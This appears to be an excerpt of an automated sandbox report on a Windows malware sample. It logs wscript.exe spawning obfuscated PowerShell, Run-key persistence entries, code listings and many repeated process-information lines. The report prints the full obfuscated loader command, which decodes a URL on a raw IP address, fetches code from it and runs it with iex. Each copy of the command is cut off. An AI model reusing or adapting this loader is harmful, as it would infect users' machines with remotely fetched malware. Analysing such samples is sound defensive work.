        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Retorsionshandlingenllustrationer = 1;$Elytrigerous='S';$Elytrigerous+='ubstrin';$Elytrigerous+='g';Function Programregningsfunktionens($Ridderne){$Retorsionshandlingennfraocular=$Ridderne.Length-$Retorsionshandlingenllustrationer;For($Retorsionshandlingen=5; $Retorsionshandlingen -lt $Retorsionshandlingennfraocular; $Retorsionshandlingen+=(6)){$Outsmokes+=$Ridderne.$Elytrigerous.Invoke( $Retorsionshandlingen, $Retorsionshandlingenllustrationer);}$Outsmokes;}function Gracy216($Begrendes){. ($Antediluvianske) ($Begrendes);}$Diskoskasteren=Programregningsfunktionens 's.perM L deoLandszAccomiTurbolBrystlSu.loa Inte/Linje5.ilfo.Brneb0B,ddi illi(MamelWKortsiExoranBowkndSp,dho.urvew,ndtrsFjase utotNmilepTb,een marga1San.u0Balli.Montr0H,rsk;.ykke BrakpWxanthi ,ervnReprs6trova4Filet;D,awc vidnxT,gue6Admin4Cotra;Insci Un btrTogstvEgipt:Inter1Riv l2For e1 daun. Gens0Sknde)Neutr Trak GRepudeGuldkc BelakTandloV.rde/ edb2Uheld0Sknhe1Elek.0Nell,0 ,rot1Un,en0Skibi1savne MordFautogiKo,merDe,inearom,fShipboHapaxxStork/Inten1Splas2Ds,es1 ilsk.Fylds0Capri ';$Sprayens=Programregningsfunktionens 'NondeU rubasVa neeBe,kir For -,geblAR.bbegholose Ta dn ParatPrivi ';$Reprogrammes=Programregningsfunktionens 'Stuf.hL.muctVersit SubspCosmo:etcif/Taksa/ Impl8Morph7Far,n.Bronz1Anal,2proc,1Ungl .unpol1Unper0F,nda5varmt. Gr,n5Roc,e4,sent/SeksaOOverrmMismamT.buleLandlsForcetmis,arAtropuDiscop,iske.AarsadUnsanesaanipBrodflDiameonamatySawai ';$Kretidseffekternes=Programregningsfunktionens 'Vejkr>Phisa ';$Antediluvianske=Programregningsfunktionens 'Etam.iRaadie saddxFasts ';$Gunlaying='Forraadnelig';Gracy216 (Programregningsfunktionens ' L urS AtikeSignatRecon- geneCPen,eo.endrnNovumtPrintelailanPorphtSt ir Peatw-AngloPObitaa elvetSymbohP,esh TrvemT,ough: ,aad\ Afv I Cerid.roldrCheskt UdpasFilerfMenneo C,lorsol,ceSuavenphaneiIndlenAabengSeepssUnche1Pre i9Wi,db7Super.RadiotNiveax t rrt Duod Evole-Un mmV selraMoraklPericuUnmoueAdvoc Melle$samstG estiu AppenRe,orl TeleaAnmrkySaponiImmunn BehvgAh.eh;Chabo ');Gracy216 (Programregningsfunktionens ' FramiHabi,fCacos larit( GrectV.stfe.olfisTalertRidge-OzonopJu iaaStoddtTabarhPigl, Pse THaand:Mosen\KomplI .oemd ilker tigetEperosKrig,f ColloPl.udr SubseMad lnNonmoiKromgnEnok g SaxosHaand1 Twir9Op oe7 Lov..Fedtst An txfarvet Rede) rtss{ Ka.me KropxFaksiiUdsket Sang} Un s; Gro, ');$Kvrne = Programregningsfunktionens 'NedraeUnconcUan.ghPet ooPaatn Munke%Kys.eaCasanpfy,depSixpedOver aGravit orema Ragl%Euboe\DevelS LovgaLaa,ngPlat sNematgBug.gn JalaiTegninOvercgArbe.eSl,knr Forsn p.ileafsvo. UnshISpirinM lartH ved .fsla&Neonr&Be.ri AdiabeTro ecUdganhSvovloeksp Trink$Ambol ';Gracy216 (Programregningsfunktionens 'Slide$SvmnigImperlAvn,soT aadb Rag,aPie alFordr: DemiVGoogoiQuittrShop k TrknsMycetofodbomHomemhDr sieEffemd De,isdawsst Bf eyOprikpBrancePatrunSongbs Thri=Nonam(Am.utcPillamSulted Stev Toksi/ ilhecRajah bed
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Retorsionshandlingenllustrationer = 1;$Elytrigerous='S';$Elytrigerous+='ubstrin';$Elytrigerous+='g';Function Programregningsfunktionens($Ridderne){$Retorsionshandlingennfraocular=$Ridderne.Length-$Retorsionshandlingenllustrationer;For($Retorsionshandlingen=5; $Retorsionshandlingen -lt $Retorsionshandlingennfraocular; $Retorsionshandlingen+=(6)){$Outsmokes+=$Ridderne.$Elytrigerous.Invoke( $Retorsionshandlingen, $Retorsionshandlingenllustrationer);}$Outsmokes;}function Gracy216($Begrendes){. ($Antediluvianske) ($Begrendes);}$Diskoskasteren=Programregningsfunktionens 's.perM L deoLandszAccomiTurbolBrystlSu.loa Inte/Linje5.ilfo.Brneb0B,ddi illi(MamelWKortsiExoranBowkndSp,dho.urvew,ndtrsFjase utotNmilepTb,een marga1San.u0Balli.Montr0H,rsk;.ykke BrakpWxanthi ,ervnReprs6trova4Filet;D,awc vidnxT,gue6Admin4Cotra;Insci Un btrTogstvEgipt:Inter1Riv l2For e1 daun. Gens0Sknde)Neutr Trak GRepudeGuldkc BelakTandloV.rde/ edb2Uheld0Sknhe1Elek.0Nell,0 ,rot1Un,en0Skibi1savne MordFautogiKo,merDe,inearom,fShipboHapaxxStork/Inten1Splas2Ds,es1 ilsk.Fylds0Capri ';$Sprayens=Programregningsfunktionens 'NondeU rubasVa neeBe,kir For -,geblAR.bbegholose Ta dn ParatPrivi ';$Reprogrammes=Programregningsfunktionens 'Stuf.hL.muctVersit SubspCosmo:etcif/Taksa/ Impl8Morph7Far,n.Bronz1Anal,2proc,1Ungl .unpol1Unper0F,nda5varmt. Gr,n5Roc,e4,sent/SeksaOOverrmMismamT.buleLandlsForcetmis,arAtropuDiscop,iske.AarsadUnsanesaanipBrodflDiameonamatySawai ';$Kretidseffekternes=Programregningsfunktionens 'Vejkr>Phisa ';$Antediluvianske=Programregningsfunktionens 'Etam.iRaadie saddxFasts ';$Gunlaying='Forraadnelig';Gracy216 (Programregningsfunktionens ' L urS AtikeSignatRecon- geneCPen,eo.endrnNovumtPrintelailanPorphtSt ir Peatw-AngloPObitaa elvetSymbohP,esh TrvemT,ough: ,aad\ Afv I Cerid.roldrCheskt UdpasFilerfMenneo C,lorsol,ceSuavenphaneiIndlenAabengSeepssUnche1Pre i9Wi,db7Super.RadiotNiveax t rrt Duod Evole-Un mmV selraMoraklPericuUnmoueAdvoc Melle$samstG estiu AppenRe,orl TeleaAnmrkySaponiImmunn BehvgAh.eh;Chabo ');Gracy216 (Programregningsfunktionens ' FramiHabi,fCacos larit( GrectV.stfe.olfisTalertRidge-OzonopJu iaaStoddtTabarhPigl, Pse THaand:Mosen\KomplI .oemd ilker tigetEperosKrig,f ColloPl.udr SubseMad lnNonmoiKromgnEnok g SaxosHaand1 Twir9Op oe7 Lov..Fedtst An txfarvet Rede) rtss{ Ka.me KropxFaksiiUdsket Sang} Un s; Gro, ');$Kvrne = Programregningsfunktionens 'NedraeUnconcUan.ghPet ooPaatn Munke%Kys.eaCasanpfy,depSixpedOver aGravit orema Ragl%Euboe\DevelS LovgaLaa,ngPlat sNematgBug.gn JalaiTegninOvercgArbe.eSl,knr Forsn p.ileafsvo. UnshISpirinM lartH ved .fsla&Neonr&Be.ri AdiabeTro ecUdganhSvovloeksp Trink$Ambol ';Gracy216 (Programregningsfunktionens 'Slide$SvmnigImperlAvn,soT aadb Rag,aPie alFordr: DemiVGoogoiQuittrShop k TrknsMycetofodbomHomemhDr sieEffemd De,isdawsst Bf eyOprikpBrancePatrunSongbs Thri=Nonam(Am.utcPillamSulted Stev Toksi/ ilhecRajah bed
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Retorsionshandlingenllustrationer = 1;$Elytrigerous='S';$Elytrigerous+='ubstrin';$Elytrigerous+='g';Function Programregningsfunktionens($Ridderne){$Retorsionshandlingennfraocular=$Ridderne.Length-$Retorsionshandlingenllustrationer;For($Retorsionshandlingen=5; $Retorsionshandlingen -lt $Retorsionshandlingennfraocular; $Retorsionshandlingen+=(6)){$Outsmokes+=$Ridderne.$Elytrigerous.Invoke( $Retorsionshandlingen, $Retorsionshandlingenllustrationer);}$Outsmokes;}function Gracy216($Begrendes){. ($Antediluvianske) ($Begrendes);}$Diskoskasteren=Programregningsfunktionens 's.perM L deoLandszAccomiTurbolBrystlSu.loa Inte/Linje5.ilfo.Brneb0B,ddi illi(MamelWKortsiExoranBowkndSp,dho.urvew,ndtrsFjase utotNmilepTb,een marga1San.u0Balli.Montr0H,rsk;.ykke BrakpWxanthi ,ervnReprs6trova4Filet;D,awc vidnxT,gue6Admin4Cotra;Insci Un btrTogstvEgipt:Inter1Riv l2For e1 daun. Gens0Sknde)Neutr Trak GRepudeGuldkc BelakTandloV.rde/ edb2Uheld0Sknhe1Elek.0Nell,0 ,rot1Un,en0Skibi1savne MordFautogiKo,merDe,inearom,fShipboHapaxxStork/Inten1Splas2Ds,es1 ilsk.Fylds0Capri ';$Sprayens=Programregningsfunktionens 'NondeU rubasVa neeBe,kir For -,geblAR.bbegholose Ta dn ParatPrivi ';$Reprogrammes=Programregningsfunktionens 'Stuf.hL.muctVersit SubspCosmo:etcif/Taksa/ Impl8Morph7Far,n.Bronz1Anal,2proc,1Ungl .unpol1Unper0F,nda5varmt. Gr,n5Roc,e4,sent/SeksaOOverrmMismamT.buleLandlsForcetmis,arAtropuDiscop,iske.AarsadUnsanesaanipBrodflDiameonamatySawai ';$Kretidseffekternes=Programregningsfunktionens 'Vejkr>Phisa ';$Antediluvianske=Programregningsfunktionens 'Etam.iRaadie saddxFasts ';$Gunlaying='Forraadnelig';Gracy216 (Programregningsfunktionens ' L urS AtikeSignatRecon- geneCPen,eo.endrnNovumtPrintelailanPorphtSt ir Peatw-AngloPObitaa elvetSymbohP,esh TrvemT,ough: ,aad\ Afv I Cerid.roldrCheskt UdpasFilerfMenneo C,lorsol,ceSuavenphaneiIndlenAabengSeepssUnche1Pre i9Wi,db7Super.RadiotNiveax t rrt Duod Evole-Un mmV selraMoraklPericuUnmoueAdvoc Melle$samstG estiu AppenRe,orl TeleaAnmrkySaponiImmunn BehvgAh.eh;Chabo ');Gracy216 (Programregningsfunktionens ' FramiHabi,fCacos larit( GrectV.stfe.olfisTalertRidge-OzonopJu iaaStoddtTabarhPigl, Pse THaand:Mosen\KomplI .oemd ilker tigetEperosKrig,f ColloPl.udr SubseMad lnNonmoiKromgnEnok g SaxosHaand1 Twir9Op oe7 Lov..Fedtst An txfarvet Rede) rtss{ Ka.me KropxFaksiiUdsket Sang} Un s; Gro, ');$Kvrne = Programregningsfunktionens 'NedraeUnconcUan.ghPet ooPaatn Munke%Kys.eaCasanpfy,depSixpedOver aGravit orema Ragl%Euboe\DevelS LovgaLaa,ngPlat sNematgBug.gn JalaiTegninOvercgArbe.eSl,knr Forsn p.ileafsvo. UnshISpirinM lartH ved .fsla&Neonr&Be.ri AdiabeTro ecUdganhSvovloeksp Trink$Ambol ';Gracy216 (Programregningsfunktionens 'Slide$SvmnigImperlAvn,soT aadb Rag,aPie alFordr: DemiVGoogoiQuittrShop k TrknsMycetofodbomHomemhDr sieEffemd De,isdawsst Bf eyOprikpBrancePatrunSongbs Thri=Nonam(Am.utcPillamSulted Stev Toksi/ ilhecRajah bed Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Retorsionshandlingenllustrationer = 1;$Elytrigerous='S';$Elytrigerous+='ubstrin';$Elytrigerous+='g';Function Programregningsfunktionens($Ridderne){$Retorsionshandlingennfraocular=$Ridderne.Length-$Retorsionshandlingenllustrationer;For($Retorsionshandlingen=5; $Retorsionshandlingen -lt $Retorsionshandlingennfraocular; $Retorsionshandlingen+=(6)){$Outsmokes+=$Ridderne.$Elytrigerous.Invoke( $Retorsionshandlingen, $Retorsionshandlingenllustrationer);}$Outsmokes;}function Gracy216($Begrendes){. ($Antediluvianske) ($Begrendes);}$Diskoskasteren=Programregningsfunktionens 's.perM L deoLandszAccomiTurbolBrystlSu.loa Inte/Linje5.ilfo.Brneb0B,ddi illi(MamelWKortsiExoranBowkndSp,dho.urvew,ndtrsFjase utotNmilepTb,een marga1San.u0Balli.Montr0H,rsk;.ykke BrakpWxanthi ,ervnReprs6trova4Filet;D,awc vidnxT,gue6Admin4Cotra;Insci Un btrTogstvEgipt:Inter1Riv l2For e1 daun. Gens0Sknde)Neutr Trak GRepudeGuldkc BelakTandloV.rde/ edb2Uheld0Sknhe1Elek.0Nell,0 ,rot1Un,en0Skibi1savne MordFautogiKo,merDe,inearom,fShipboHapaxxStork/Inten1Splas2Ds,es1 ilsk.Fylds0Capri ';$Sprayens=Programregningsfunktionens 'NondeU rubasVa neeBe,kir For -,geblAR.bbegholose Ta dn ParatPrivi ';$Reprogrammes=Programregningsfunktionens 'Stuf.hL.muctVersit SubspCosmo:etcif/Taksa/ Impl8Morph7Far,n.Bronz1Anal,2proc,1Ungl .unpol1Unper0F,nda5varmt. Gr,n5Roc,e4,sent/SeksaOOverrmMismamT.buleLandlsForcetmis,arAtropuDiscop,iske.AarsadUnsanesaanipBrodflDiameonamatySawai ';$Kretidseffekternes=Programregningsfunktionens 'Vejkr>Phisa ';$Antediluvianske=Programregningsfunktionens 'Etam.iRaadie saddxFasts ';$Gunlaying='Forraadnelig';Gracy216 (Programregningsfunktionens ' L urS AtikeSignatRecon- geneCPen,eo.endrnNovumtPrintelailanPorphtSt ir Peatw-AngloPObitaa elvetSymbohP,esh TrvemT,ough: ,aad\ Afv I Cerid.roldrCheskt UdpasFilerfMenneo C,lorsol,ceSuavenphaneiIndlenAabengSeepssUnche1Pre i9Wi,db7Super.RadiotNiveax t rrt Duod Evole-Un mmV selraMoraklPericuUnmoueAdvoc Melle$samstG estiu AppenRe,orl TeleaAnmrkySaponiImmunn BehvgAh.eh;Chabo ');Gracy216 (Programregningsfunktionens ' FramiHabi,fCacos larit( GrectV.stfe.olfisTalertRidge-OzonopJu iaaStoddtTabarhPigl, Pse THaand:Mosen\KomplI .oemd ilker tigetEperosKrig,f ColloPl.udr SubseMad lnNonmoiKromgnEnok g SaxosHaand1 Twir9Op oe7 Lov..Fedtst An txfarvet Rede) rtss{ Ka.me KropxFaksiiUdsket Sang} Un s; Gro, ');$Kvrne = Programregningsfunktionens 'NedraeUnconcUan.ghPet ooPaatn Munke%Kys.eaCasanpfy,depSixpedOver aGravit orema Ragl%Euboe\DevelS LovgaLaa,ngPlat sNematgBug.gn JalaiTegninOvercgArbe.eSl,knr Forsn p.ileafsvo. UnshISpirinM lartH ved .fsla&Neonr&Be.ri AdiabeTro ecUdganhSvovloeksp Trink$Ambol ';Gracy216 (Programregningsfunktionens 'Slide$SvmnigImperlAvn,soT aadb Rag,aPie alFordr: DemiVGoogoiQuittrShop k TrknsMycetofodbomHomemhDr sieEffemd De,isdawsst Bf eyOprikpBrancePatrunSongbs Thri=Nonam(Am.utcPillamSulted Stev Toksi/ ilhecRajah bed Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFD348C00BD pushad ; iretd 8_2_00007FFD348C00C1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFD348C0A08 push E95B63D0h; ret 8_2_00007FFD348C09C9
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFD348C0988 push E95B63D0h; ret 8_2_00007FFD348C09C9
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFD349971C8 push esp; retf 8_2_00007FFD349971C9
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_0308333B pushfd ; retf 11_2_030833C1
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_030833AD pushad ; retf 11_2_030833B1
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_076408D8 push eax; mov dword ptr [esp], ecx11_2_07640AC4
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_0764B144 push 8B6BAABFh; iretd 11_2_0764B149
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_07640AB8 push eax; mov dword ptr [esp], ecx11_2_07640AC4
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_08452AF5 push ebx; ret 11_2_08452B32
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_08452B41 push ebx; ret 11_2_08452B32
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_08452B63 push ebx; ret 11_2_08452B32
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_3_08975E1A push AA369B36h; iretd 17_3_08975E59
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_3_08975E1A push AA369B36h; iretd 17_3_08975E59
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_3_08975D31 push AA369B36h; iretd 17_3_08975E59
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_3_08975D31 push AA369B36h; iretd 17_3_08975E59
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_3_244A1BFF push eax; iretd 17_3_244A1C31
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_3_244AAF9A push ss; iretd 17_3_244AAFE1
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_3_08975E1A push AA369B36h; iretd 17_3_08975E59
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_3_08975E1A push AA369B36h; iretd 17_3_08975E59
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_3_0897839E push 8BFFFFFBh; retf 17_3_089783A3
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_3_08975D31 push AA369B36h; iretd 17_3_08975E59
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_3_08975D31 push AA369B36h; iretd 17_3_08975E59
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_2481D4F2 push 0E0004C8h; retf 17_2_2481DA45
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_248127FA pushad ; ret 17_2_248127F9
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_2481B008 push es; iretd 17_2_2481B009
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_2481D82D push 0E0004C8h; retf 17_2_2481DA45
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_24819939 push es; iretd 17_2_24819940
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_2481283D push eax; iretd 17_2_24812858
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_2481DA5A push 0E0004C8h; retf 17_2_2481DA45
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 17_2_2481225F pushad ; ret 17_2_248127F9

        Boot Survival

        barindex
        Creates multiple autostart registry keys
        Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AchaqueJump to behavior
        Source: C:\Windows\SysWOW64\xcopy.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run VLGXKP5HJLJump to behavior
        Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AchaqueJump to behavior
        Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run AchaqueJump to behavior
        Source: C:\Windows\SysWOW64\xcopy.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run VLGXKP5HJLJump to behavior
        Source: C:\Windows\SysWOW64\xcopy.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run VLGXKP5HJLJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
